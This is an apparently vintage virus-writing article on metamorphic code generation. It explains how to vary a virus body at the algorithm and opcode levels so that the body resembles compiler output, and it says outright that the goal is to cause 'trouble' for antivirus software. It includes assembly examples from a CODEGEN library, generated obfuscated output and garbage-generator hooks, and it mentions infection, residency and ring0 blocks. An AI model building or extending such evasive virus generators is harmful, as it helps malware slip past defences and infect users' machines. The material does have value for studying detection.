This text describes some ideas about polymorphic code generation.
So, our task is to generate code with the following properties:
performing some specified actions
polymorphic
similar to code generated by HLL compilers
different from code used in known viruses
Two generated (metamorphic) virus bodies may differ:
on the algorithm-level
on the opcode-level
What is algorithm-level?
The whole generated (metamorphic) body consists of interchangeable algorithmic parts, in other words of blocks each performing a single task, such as file operations, ring0-entering, residency, handlers, infecting subroutines, etc., and each of these blocks may have several variants. I.e. on this level the generated body consists of something like subroutines, and each of them is randomly selected (from a predefined set) during generation.
What is opcode-level?
This just means that each pseudo-language element (the basis of the algorithm-level) may be converted (compiled) into different sets of opcodes; then these opcodes may be changed and/or mixed.
Example
Task: calculate f(x) = 10 * sin(2 * x)
          ------------------------ algorithm-level ----------------------->
   |
   |      f(x) = 10*sin(2*x)          f(x) = sin(x)*cos(x)*20
   |
   |      variant 1                   variant 2
   |
   |      t = x                       t = x
opcode-   t = t * 2                   a = sin(t)
-level    t = sin(t)                  b = cos(t)
   |      t = t * 10                  t = a * b
   |                                  t = t * 20
   |
   |      variant 3                   variant 4
   |
   |      t = 2 * x                   b = cos(x)
   |      a = sin(t)                  t = 20 * b
   |      t = 10 * a                  a = sin(x)
   |                                  t = t * a
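The two algorithm-level formulas in this example are the same function, which follows from the double-angle identity sin(2x) = 2*sin(x)*cos(x). A short derivation, added here only as a check and not part of the original text:

```latex
\begin{align*}
f(x) &= 10\sin(2x) \\
     &= 10\,(2\sin x\cos x) \\
     &= 20\,\sin x\cos x
\end{align*}
```

Variants 1 and 3 compute the first form; variants 2 and 4 compute the last form and differ only in the order of operations.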
Algorithm generation
It is clear that we cannot change code on the algorithm-level, so all the variants of an action must be predefined. The more variants of the same action you use, the more trouble your virus causes for AV software. Let's imagine a virus consisting of blocks A and B, where each of them has two variants: A1/A2 and B1/B2. So, we have 4 different viruses: A1B1, A1B2, A2B1 and A2B2. For example, A1=residency, A2=current directory scanning, B1=COM infection and B2=EXE infection. And each of the A1/A2/... subblocks may be changed in the same way, and so on.
Code generation
This is the main subject of this article. It may be said that a metamorphic code generator is a kind of virus constructor which works automatically and produces not source but code.
So, we have one variant of the algorithm, which is represented using variables. Further, all operations between these variables will be implemented using registers.
This allows us:
to use a fixed set of opcodes, which is easy and resembles HLL code;
to use lots of garbage (because there will be no globally used registers);
to write code that disassembles badly.
So, on the level of variables the following macros may be used:
These variable-level macros are expanded into register-level:
cmd v, c
    mov r, c
    cmd v, r

cmd v1, [v2]
    mov r2, v2
    ...
    cmd r1, [r2]
    mov v1, r1

cmd [v1], v2
    mov r1, v1
    mov r2, v2
    cmd [r1], r2

cmd v1, v2
    mov r1, v1          mov r1, v1          mov r2, v2
    mov r2, v2          cmd r1, v2          cmd v1, r2
    cmd r1, r2          mov v1, r1
    mov v1, r1

cmd r, v
    mov r1, offset v    cmd r, v
    cmd r, [r1]

mov v, r
    mov r1, offset v    cmd v, r
    cmd [r1], r

mov r, c
    ...
At the end of this text there is the CODE GENERATOR library, which allows you to generate code that works with variables on the register-level.
Let our task be to calculate c = a xor b, where a, b and c are memory variables. Then the CODEGEN library allows you to do just this:
lea     edi, outbuf

push    c_mov
push    offset c
push    offset a
call    cmd_v_v                 ; mov c, a

push    c_xor
push    offset c
push    offset b
call    cmd_v_v                 ; xor c, b
Or, using macros, write:
lea     edi, outbuf
call3 cmd_v_v, c_mov, <offset c>, <offset a> ; c = a
call3 cmd_v_v, c_xor, <offset c>, <offset b> ; c ^= b
After that, the following code will be generated:
variant 1                       variant 2

push 0C84B53DEh                 mov eax,[1000400Ch]
pop ebx                         mov [10004014h],eax
add ebx, 47B4EC2Eh              push d,[10004010h]
mov ecx, [ebx]                  pop ecx
mov ebx, ecx                    mov edx,0C8417FA7h
push 78F2C937h                  add edx,47BEC06Dh
pop eax                         xor [edx],ecx
sub eax, 68F28923h
mov [eax], ebx
push 0CC8FF745h
pop eax
add eax, 437048CBh
push dword ptr [eax]
pop edx
push edx
pop ebx
push 0AE0577D4h
pop esi
xor esi, 0BC5A5A6Dh
sub esi, 75F6D972h
sub esi, 78BBFB1Bh
xor esi, 0C9CC8138h
sub esi, 993B95D9h
sub esi, 81A3404Eh
add esi, 407E3E27h
xor [esi], ebx
You may also include the following subroutine into your source:
endcmd: mov     al, 90h         ; nop
        stosb
        ret
This subroutine will be called after each new opcode is stored into the output buffer. It is easy to see that it may be replaced with a garbage generator or simply with RET.
Here is an example of the 'c = a xor b' generator using the ETG garbage generator:
;cmd_v_c:     stack:cmd,v,c    edi
;cmd_v_v:     stack:cmd,v1,v2  edi
;cmd_v_memv:  stack:cmd,v1,v2  edi
;cmd_memv_v:  stack:cmd,v1,v2  edi
;cmd_r_r:     stack:cmd,r1,r2  edi
;mov_r_offsv: stack:r,v        edi
;cmd_r_c:     stack:cmd,r,c    edi
;cmd_r_memr:  stack:cmd,r1,r2  edi
;cmd_memr_r:  stack:cmd,r1,r2  edi
;cmd_r_v:     stack:cmd,r,v    edi
;cmd_v_r:     stack:cmd,v,r    edi